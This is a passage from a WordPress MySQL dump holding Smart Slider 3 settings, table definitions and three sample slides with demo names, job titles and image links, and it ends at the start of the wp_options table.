"blockrightclick\":\"0\",\"overflow-hidden-page\":\"0\",\"scroll-fix\":\"0\",\"bg-parallax-tablet\":\"1\",\"bg-parallax-mobile\":\"1\",\"callbacks\":\"\",\"widgetarrow\":\"imageEmpty\",\"widget-arrow-display-desktop\":\"1\",\"widget-arrow-display-tablet\":\"1\",\"widget-arrow-display-mobile\":\"1\",\"widget-arrow-exclude-slides\":\"\",\"widget-arrow-display-hover\":\"0\",\"widget-arrow-responsive-desktop\":\"1\",\"widget-arrow-responsive-tablet\":\"0.7\",\"widget-arrow-responsive-mobile\":\"0.5\",\"widget-arrow-previous-image\":\"\",\"widget-arrow-previous\":\"$ss$/plugins/widgetarrow/image/image/previous/thin-horizontal.svg\",\"widget-arrow-previous-color\":\"ffffffcc\",\"widget-arrow-previous-hover\":\"0\",\"widget-arrow-previous-hover-color\":\"ffffffcc\",\"widget-arrow-style\":\"\",\"widget-arrow-previous-position-mode\":\"simple\",\"widget-arrow-previous-position-area\":\"6\",\"widget-arrow-previous-position-stack\":\"1\",\"widget-arrow-previous-position-offset\":\"15\",\"widget-arrow-previous-position-horizontal\":\"left\",\"widget-arrow-previous-position-horizontal-position\":\"0\",\"widget-arrow-previous-position-horizontal-unit\":\"px\",\"widget-arrow-previous-position-vertical\":\"top\",\"widget-arrow-previous-position-vertical-position\":\"0\",\"widget-arrow-previous-position-vertical-unit\":\"px\",\"widget-arrow-next-position-mode\":\"simple\",\"widget-arrow-next-position-area\":\"7\",\"widget-arrow-next-position-stack\":\"1\",\"widget-arrow-next-position-offset\":\"15\",\"widget-arrow-next-position-horizontal\":\"left\",\"widget-arrow-next-position-horizontal-position\":\"0\",\"widget-arrow-next-position-horizontal-unit\":\"px\",\"widget-arrow-next-position-vertical\":\"top\",\"widget-arrow-next-position-vertical-position\":\"0\",\"widget-arrow-next-position-vertical-unit\":\"px\",\"widget-arrow-animation\":\"fade\",\"widget-arrow-mirror\":\"1\",\"widget-arrow-next-image\":\"\",\"widget-arrow-next\":\"$ss$/plugins/widgetarrow/image/image/next/thin-horizontal.svg\",\"widget-arrow-next-color\":\"ffffffcc\",\"widget-arrow-next-hover\":\"0\",\"widget-arrow-next-hover-color\":\"ffffffcc\",\"widgetbullet\":\"transition\",\"widget-bullet-display-desktop\":\"1\",\"widget-bullet-display-tablet\":\"1\",\"widget-bullet-display-mobile\":\"1\",\"widget-bullet-exclude-slides\":\"\",\"widget-bullet-display-hover\":\"0\",\"widget-bullet-thumbnail-show-image\":\"1\",\"widget-bullet-thumbnail-width\":\"120\",\"widget-bullet-thumbnail-height\":\"81\",\"widget-bullet-thumbnail-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwODAiLCJwYWRkaW5nIjoiM3wqfDN8KnwzfCp8M3wqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIzIiwiZXh0cmEiOiJtYXJnaW46IDVweDsifV19\",\"widget-bullet-thumbnail-side\":\"before\",\"widget-bullet-position-mode\":\"simple\",\"widget-bullet-position-area\":\"12\",\"widget-bullet-position-stack\":\"1\",\"widget-bullet-position-offset\":\"10\",\"widget-bullet-position-horizontal\":\"left\",\"widget-bullet-position-horizontal-position\":\"0\",\"widget-bullet-position-horizontal-unit\":\"px\",\"widget-bullet-position-vertical\":\"top\",\"widget-bullet-position-vertical-position\":\"0\",\"widget-bullet-position-vertical-unit\":\"px\",\"widget-bullet-action\":\"click\",\"widget-bullet-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwYWIiLCJwYWRkaW5nIjoiNXwqfDV8Knw1fCp8NXwqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiI1MCIsImV4dHJhIjoibWFyZ2luOiA0cHg7In0seyJleHRyYSI6IiIsImJhY2tncm91bmRjb2xvciI6IjA5YjQ3NGZmIn1dfQ==\",\"widget-bullet-bar\":\"\",\"widget-bullet-bar-full-size\":\"0\",\"widget-bullet-align\":\"center\",\"widget-bullet-orientation\":\"auto\",\"widget-bullet-overlay\":\"0\",\"widgetautoplay\":\"disabled\",\"widget-autoplay-display-desktop\":\"1\",\"widget-autoplay-display-tablet\":\"1\",\"widget-autoplay-display-mobile\":\"1\",\"widget-autoplay-exclude-slides\":\"\",\"widget-autoplay-display-hover\":\"0\",\"widgetindicator\":\"disabled\",\"widget-indicator-display-desktop\":\"1\",\"widget-indicator-display-tablet\":\"1\",\"widget-indicator-display-mobile\":\"1\",\"widget-indicator-exclude-slides\":\"\",\"widget-indicator-display-hover\":\"0\",\"widgetbar\":\"disabled\",\"widget-bar-display-desktop\":\"1\",\"widget-bar-display-tablet\":\"1\",\"widget-bar-display-mobile\":\"1\",\"widget-bar-exclude-slides\":\"\",\"widget-bar-display-hover\":\"0\",\"widgetthumbnail\":\"disabled\",\"widget-thumbnail-display-desktop\":\"1\",\"widget-thumbnail-display-tablet\":\"1\",\"widget-thumbnail-display-mobile\":\"1\",\"widget-thumbnail-exclude-slides\":\"\",\"widget-thumbnail-display-hover\":\"0\",\"widget-thumbnail-show-image\":\"1\",\"widget-thumbnail-width\":\"100\",\"widget-thumbnail-height\":\"60\",\"widgetshadow\":\"disabled\",\"widget-shadow-display-desktop\":\"1\",\"widget-shadow-display-tablet\":\"1\",\"widget-shadow-display-mobile\":\"1\",\"widget-shadow-exclude-slides\":\"\",\"widgetfullscreen\":\"disabled\",\"widget-fullscreen-display-desktop\":\"1\",\"widget-fullscreen-display-tablet\":\"1\",\"widget-fullscreen-display-mobile\":\"1\",\"widget-fullscreen-exclude-slides\":\"\",\"widget-fullscreen-display-hover\":\"0\",\"widgethtml\":\"disabled\",\"widget-html-display-desktop\":\"1\",\"widget-html-display-tablet\":\"1\",\"widget-html-display-mobile\":\"1\",\"widget-html-exclude-slides\":\"\",\"widget-html-display-hover\":\"0\",\"widgets\":\"arrow\"}', '2015-11-01 14:14:20', '', 0);
-- --------------------------------------------------------
--
-- Table structure for table `wp_nextend2_smartslider3_sliders_xref`
--
CREATE TABLE `wp_nextend2_smartslider3_sliders_xref` (
`group_id` int(11) NOT NULL,
`slider_id` int(11) NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_nextend2_smartslider3_slides`
--
CREATE TABLE `wp_nextend2_smartslider3_slides` (
`id` int(11) NOT NULL,
`title` varchar(200) NOT NULL,
`slider` int(11) NOT NULL,
`publish_up` datetime NOT NULL,
`publish_down` datetime NOT NULL,
`published` tinyint(1) NOT NULL,
`first` int(11) NOT NULL,
`slide` longtext DEFAULT NULL,
`description` text NOT NULL,
`thumbnail` varchar(255) NOT NULL,
`params` text NOT NULL,
`ordering` int(11) NOT NULL,
`generator_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- Dumping data for table `wp_nextend2_smartslider3_slides`
--
INSERT INTO `wp_nextend2_smartslider3_slides` (`id`, `title`, `slider`, `publish_up`, `publish_down`, `published`, `first`, `slide`, `description`, `thumbnail`, `params`, `ordering`, `generator_id`) VALUES
(1, 'Slide One', 1, '2015-11-01 12:27:34', '2025-11-11 12:27:34', 1, 0, '[{\"type\":\"content\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px+\",\"desktopportraitselfalign\":\"inherit\",\"mobileportraitfontsize\":60,\"opened\":1,\"id\":null,\"class\":\"\",\"crop\":\"\",\"parallax\":0,\"adaptivefont\":1,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Content\",\"namesynced\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgimageparallax\":0,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"layer\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"10|*|0|*|10|*|0|*|px+\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"id\":null,\"class\":\"\",\"crop\":\"visible\",\"parallax\":0,\"adaptivefont\":0,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Martin Dwyer\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"heading\":\"Martin Dwyer\",\"link\":\"#|*|_self\",\"priority\":\"2\",\"fullwidth\":\"0\",\"nowrap\":\"0\",\"title\":\"\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6IjBiMGIwYmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxLjUiLCJib2xkIjowLCJpdGFsaWMiOjAsInVuZGVybGluZSI6MCwiYWxpZ24iOiJjZW50ZXIiLCJsZXR0ZXJzcGFjaW5nIjoiMTBweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6InVwcGVyY2FzZSJ9LHsiZXh0cmEiOiIifSx7ImV4dHJhIjoiIn1dfQ==\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJiYWNrZ3JvdW5kY29sb3IiOiJmZmZmZmZjYyIsIm9wYWNpdHkiOjEwMCwicGFkZGluZyI6IjAuNHwqfDF8KnwwLjR8KnwxfCp8ZW0iLCJib3hzaGFkb3ciOiIwfCp8MHwqfDB8KnwwfCp8MDAwMDAwZmYiLCJib3JkZXIiOiIwfCp8c29saWR8KnwwMDAwMDBmZiIsImJvcmRlcnJhZGl1cyI6IjAifSx7ImV4dHJhIjoiIn1dfQ==\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"split-text-backface-visibility\":\"1\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"class\":\"\"}}},{\"type\":\"layer\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px+\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"id\":null,\"class\":\"\",\"crop\":\"visible\",\"parallax\":0,\"adaptivefont\":0,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Application Developer\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"heading\":\"Application Developer\",\"link\":\"#|*|_self\",\"priority\":\"2\",\"fullwidth\":\"0\",\"nowrap\":\"1\",\"title\":\"\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjIyfHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjJweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6Im5vbmUifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"split-text-backface-visibility\":\"1\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"class\":\"\"}}}]}]', '', 'https://smartslider3.com/sample/developerthumbnail.jpg', '{\"background-type\":\"image\",\"backgroundVideoMp4\":\"\",\"backgroundVideoMuted\":\"1\",\"backgroundVideoLoop\":\"1\",\"preload\":\"auto\",\"backgroundVideoMode\":\"fill\",\"backgroundImage\":\"https://smartslider3.com/sample/programmer.jpg\",\"backgroundFocusX\":\"50\",\"backgroundFocusY\":\"50\",\"backgroundImageOpacity\":\"100\",\"backgroundImageBlur\":\"0\",\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundMode\":\"default\",\"background-animation\":\"\",\"background-animation-speed\":\"default\",\"kenburns-animation\":\"50|*|50|*|\",\"kenburns-animation-speed\":\"default\",\"kenburns-animation-strength\":\"default\",\"thumbnailType\":\"default\",\"link\":\"|*|_self\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"first\":\"0\",\"static-slide\":\"0\",\"slide-duration\":\"0\",\"version\":\"3.2.0\"}', 0, 0),
(2, 'Slide Two', 1, '2015-11-01 12:27:34', '2025-11-11 12:27:34', 1, 0, '[{\"type\":\"content\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px+\",\"desktopportraitselfalign\":\"inherit\",\"mobileportraitfontsize\":60,\"opened\":1,\"id\":null,\"class\":\"\",\"crop\":\"\",\"parallax\":0,\"adaptivefont\":1,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Content\",\"namesynced\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgimageparallax\":0,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"layer\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"10|*|0|*|10|*|0|*|px+\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"id\":null,\"class\":\"\",\"crop\":\"visible\",\"parallax\":0,\"adaptivefont\":0,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Rachel Wright\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"heading\":\"Rachel Wright\",\"link\":\"#|*|_self\",\"priority\":\"2\",\"fullwidth\":\"0\",\"nowrap\":\"0\",\"title\":\"\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6IjBiMGIwYmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxLjUiLCJib2xkIjowLCJpdGFsaWMiOjAsInVuZGVybGluZSI6MCwiYWxpZ24iOiJjZW50ZXIiLCJsZXR0ZXJzcGFjaW5nIjoiMTBweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6InVwcGVyY2FzZSJ9LHsiZXh0cmEiOiIifSx7ImV4dHJhIjoiIn1dfQ==\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJiYWNrZ3JvdW5kY29sb3IiOiJmZmZmZmZjYyIsIm9wYWNpdHkiOjEwMCwicGFkZGluZyI6IjAuNHwqfDF8KnwwLjR8KnwxfCp8ZW0iLCJib3hzaGFkb3ciOiIwfCp8MHwqfDB8KnwwfCp8MDAwMDAwZmYiLCJib3JkZXIiOiIwfCp8c29saWR8KnwwMDAwMDBmZiIsImJvcmRlcnJhZGl1cyI6IjAifSx7ImV4dHJhIjoiIn1dfQ==\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"split-text-backface-visibility\":\"1\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"class\":\"\"}}},{\"type\":\"layer\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px+\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"id\":null,\"class\":\"\",\"crop\":\"visible\",\"parallax\":0,\"adaptivefont\":0,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Art Director & Photographer\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"heading\":\"Art Director & Photographer\",\"link\":\"#|*|_self\",\"priority\":\"2\",\"fullwidth\":\"0\",\"nowrap\":\"1\",\"title\":\"\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjIyfHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjJweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6Im5vbmUifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"split-text-backface-visibility\":\"1\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"class\":\"\"}}}]}]', '', 'https://smartslider3.com/sample/artdirectorthumbnail.jpg', '{\"background-type\":\"image\",\"backgroundVideoMp4\":\"\",\"backgroundVideoMuted\":\"1\",\"backgroundVideoLoop\":\"1\",\"preload\":\"auto\",\"backgroundVideoMode\":\"fill\",\"backgroundImage\":\"https://smartslider3.com/sample/free1.jpg\",\"backgroundFocusX\":\"50\",\"backgroundFocusY\":\"50\",\"backgroundImageOpacity\":\"100\",\"backgroundImageBlur\":\"0\",\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundMode\":\"default\",\"background-animation\":\"\",\"background-animation-speed\":\"default\",\"kenburns-animation\":\"50|*|50|*|\",\"kenburns-animation-speed\":\"default\",\"kenburns-animation-strength\":\"default\",\"thumbnailType\":\"default\",\"link\":\"|*|_self\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"first\":\"0\",\"static-slide\":\"0\",\"slide-duration\":\"0\",\"version\":\"3.2.0\"}', 1, 0),
(3, 'Slide Three', 1, '2015-11-01 12:27:34', '2025-11-11 12:27:34', 1, 0, '[{\"type\":\"content\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px+\",\"desktopportraitselfalign\":\"inherit\",\"mobileportraitfontsize\":60,\"opened\":1,\"id\":null,\"class\":\"\",\"crop\":\"\",\"parallax\":0,\"adaptivefont\":1,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Content\",\"namesynced\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgimageparallax\":0,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"layer\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"10|*|0|*|10|*|0|*|px+\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"id\":null,\"class\":\"\",\"crop\":\"visible\",\"parallax\":0,\"adaptivefont\":0,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Andrew Butler\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"heading\":\"Andrew Butler\",\"link\":\"#|*|_self\",\"priority\":\"2\",\"fullwidth\":\"0\",\"nowrap\":\"0\",\"title\":\"\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6IjBiMGIwYmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxLjUiLCJib2xkIjowLCJpdGFsaWMiOjAsInVuZGVybGluZSI6MCwiYWxpZ24iOiJjZW50ZXIiLCJsZXR0ZXJzcGFjaW5nIjoiMTBweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6InVwcGVyY2FzZSJ9LHsiZXh0cmEiOiIifSx7ImV4dHJhIjoiIn1dfQ==\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJiYWNrZ3JvdW5kY29sb3IiOiJmZmZmZmZjYyIsIm9wYWNpdHkiOjEwMCwicGFkZGluZyI6IjAuNHwqfDF8KnwwLjR8KnwxfCp8ZW0iLCJib3hzaGFkb3ciOiIwfCp8MHwqfDB8KnwwfCp8MDAwMDAwZmYiLCJib3JkZXIiOiIwfCp8c29saWR8KnwwMDAwMDBmZiIsImJvcmRlcnJhZGl1cyI6IjAifSx7ImV4dHJhIjoiIn1dfQ==\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"split-text-backface-visibility\":\"1\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"class\":\"\"}}},{\"type\":\"layer\",\"animations\":\"\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px+\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"id\":null,\"class\":\"\",\"crop\":\"visible\",\"parallax\":0,\"adaptivefont\":0,\"mouseenter\":\"\",\"click\":\"\",\"mouseleave\":\"\",\"play\":\"\",\"pause\":\"\",\"stop\":\"\",\"generatorvisible\":\"\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Photographer & Illustrator\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"heading\":\"Photographer & Illustrator\",\"link\":\"#|*|_self\",\"priority\":\"2\",\"fullwidth\":\"0\",\"nowrap\":\"0\",\"title\":\"\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjIyfHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjJweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6Im5vbmUifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"split-text-backface-visibility\":\"1\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"class\":\"\"}}}]}]', '', 'https://smartslider3.com/sample/photographerthumbnail.jpg', '{\"background-type\":\"image\",\"backgroundVideoMp4\":\"\",\"backgroundVideoMuted\":\"1\",\"backgroundVideoLoop\":\"1\",\"preload\":\"auto\",\"backgroundVideoMode\":\"fill\",\"backgroundImage\":\"https://smartslider3.com/sample/photographer.jpg\",\"backgroundFocusX\":\"50\",\"backgroundFocusY\":\"50\",\"backgroundImageOpacity\":\"100\",\"backgroundImageBlur\":\"0\",\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundMode\":\"default\",\"background-animation\":\"\",\"background-animation-speed\":\"default\",\"kenburns-animation\":\"50|*|50|*|\",\"kenburns-animation-speed\":\"default\",\"kenburns-animation-strength\":\"default\",\"thumbnailType\":\"default\",\"link\":\"|*|_self\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"first\":\"0\",\"static-slide\":\"0\",\"slide-duration\":\"0\",\"version\":\"3.2.0\"}', 2, 0);
-- --------------------------------------------------------
--
-- Table structure for table `wp_options`
--
CREATE TABLE `wp_options` (
`option_id` bigint(20) UNSIGNED NOT NULL,
`option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_options`
--
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
